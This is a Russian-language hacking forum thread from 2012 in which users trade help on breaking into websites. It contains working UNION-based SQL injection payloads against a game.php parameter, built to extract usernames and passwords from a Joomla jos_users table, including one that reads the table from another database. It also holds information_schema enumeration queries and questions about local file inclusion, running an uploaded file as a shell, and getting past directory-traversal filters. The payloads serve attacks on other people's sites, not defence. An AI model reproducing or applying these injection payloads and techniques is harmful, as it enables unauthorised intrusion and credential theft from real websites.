04.05.2012, 21:48
|
|
Новичок
Регистрация: 19.01.2011
Сообщений: 14
С нами:
8059286
Репутация:
0
|
|
Сообщение от Compton
если есть скуль,то раскручивать ее до инфы с таблицы wp_users
а если нету?
|
|
|
04.05.2012, 22:47
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
С нами:
8814194
Репутация:
0
|
|
Вы хотите без уязвимости сделать дамп БД? Извините, Вы не маг случайно?
|
|
|
|
05.05.2012, 03:25
|
|
Постоянный
Регистрация: 13.10.2010
Сообщений: 375
С нами:
8200406
Репутация:
38
|
|
Есть инклуд, есть ава, есть ошибка, по которой виден путь.
Но ава почему-то не инклудится, хотя другие картинки инклудятся. Все вроде на 1-м сервере.
Это Mod rewrite шалит?
Как понять что за фигня?
|
|
|
|
05.05.2012, 10:57
|
|
Участник форума
Регистрация: 01.12.2011
Сообщений: 120
С нами:
7604246
Репутация:
55
|
|
Сообщение от None
Это Mod rewrite шалит?
мод реврайт не действует для инклудов
Сообщение от None
Но ава почему-то не инклудится, хотя другие картинки инклудятся. Все вроде на 1-м сервере.
ну вот наверное не на 1 сервере, или что то не правильно делаешь, чтобы наверняка найди настройки апача и посмотри есть ли там такой хост
Сообщение от None
Как понять что за фигня?
если сам не можешь, выложи, что гадать то, мож и поможет кто
|
|
|
|
05.05.2012, 11:18
|
|
Участник форума
Регистрация: 30.07.2011
Сообщений: 151
С нами:
7782806
Репутация:
0
|
|
Раскручиваю sql- иньекцию.
Наугад нашел таблицу games.
Запрос вида:
Сообщение от None
game.php?gameid=-1+union+select+1,2,3,4,5,6,7,8+FROM+games--
работает.
Запрос типа:
Сообщение от None
game.php?gameid=-1+union+select+1,2,3,4,5,6,7,8+FROM+jos_users--
не работает.
Хотя таблицу games в БД я найти не могу. А таблицу jos_users - могу найти. но вывести данные не получается.
Сообщение от None
game.php?gameid=-1+union+select+1,UNHEX(HEX(COLUMN_NAME)),3,4,5,6,7 ,8+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAM E=0x6a6f735f7573657273+LIMIT+2,1%20--
- срабатывает.
Подозреваю на фильтрацию или некорректную кодировку в базе данных.
Вопрос, как можно будет зафильтровать jos_users, чтобы можно было делать запросы и выводить данные из логина-паролей типа:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]game[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]gameid[/COLOR][COLOR="#007700"]=-[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]union[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]select[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]concat_ws[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0x03a[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]username[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]password[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]5[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]6[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]7[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]FROM[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]jos_users[/COLOR][COLOR="#007700"]--[/COLOR][/COLOR]
|
|
|
|
05.05.2012, 11:27
|
|
Участник форума
Регистрация: 01.12.2011
Сообщений: 120
С нами:
7604246
Репутация:
55
|
|
А я подозреваю что таблица в другой бд
|
|
|
|
05.05.2012, 12:12
|
|
Участник форума
Регистрация: 30.07.2011
Сообщений: 151
С нами:
7782806
Репутация:
0
|
|
Если в таком случае - как правильно создать запрос для вывода данных из другой базы данных?
|
|
|
|
05.05.2012, 13:37
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
С нами:
8814194
Репутация:
0
|
|
to Muracha
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]game[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]gameid[/COLOR][COLOR="#007700"]=-[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]union[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]select[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]concat_ws[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0x03a[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]username[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]password[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]5[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]6[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]7[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]FROM[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]anotherdb[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]jos_users[/COLOR][COLOR="#007700"]--[/COLOR][/COLOR]
Для вывода таблиц из другой базы данных
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]select table_name from information_schema[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]tables where table_schema[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'anotherdb'[/COLOR][COLOR="#0000BB"]limit 0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"];[/COLOR][/COLOR]
Так же делаем с колонками
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]select column_name from information_schema[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]columns where table_name[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'jos_users'[/COLOR][COLOR="#007700"]and[/COLOR][COLOR="#0000BB"]table_schema[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'anotherdb'[/COLOR][COLOR="#0000BB"]limit 0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"];[/COLOR][/COLOR]
|
|
|
|
05.05.2012, 16:49
|
|
Новичок
Регистрация: 08.05.2009
Сообщений: 8
С нами:
8952260
Репутация:
1
|
|
Не знаю туда или нет, но все-таки спрошу:
Есть доступ к админке, там есть возможность заливки pdf файла. В итоге файл получает ссылку вида http://shell.com/download.php?id=418.
В БД никаких упоминай о файле... По крайней мере в данных к которым у меня есть доступ.
Вопрос в том как этот файл запустить.
P.S По этой ссылке выдает ошибку "Не удалось загрузить документ PDF.
|
|
|
|
06.05.2012, 19:32
|
|
Новичок
Регистрация: 29.04.2012
Сообщений: 15
С нами:
7388246
Репутация:
0
|
|
Существует ли альтернатива для поднятия на директорию выше?
^^ фильтруются
Подняться на одну могу через ../ Выше никак.
Выдаёт:
Код:
Forbidden
You don't have permission to access /script.php on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
